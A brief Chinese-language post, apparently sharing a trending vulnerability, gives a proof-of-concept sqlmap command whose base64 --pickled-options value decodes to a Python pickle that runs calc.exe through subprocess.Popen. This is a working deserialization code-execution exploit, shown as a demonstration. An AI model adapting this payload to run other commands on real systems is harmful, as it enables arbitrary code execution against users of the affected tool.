这个漏洞今天在微博上传的比较火。。。。。
下面给出相关POC

sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="

base64解码

csubprocessPopenp1(S'calc.exe'p2tp3Rp4.

视频
http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf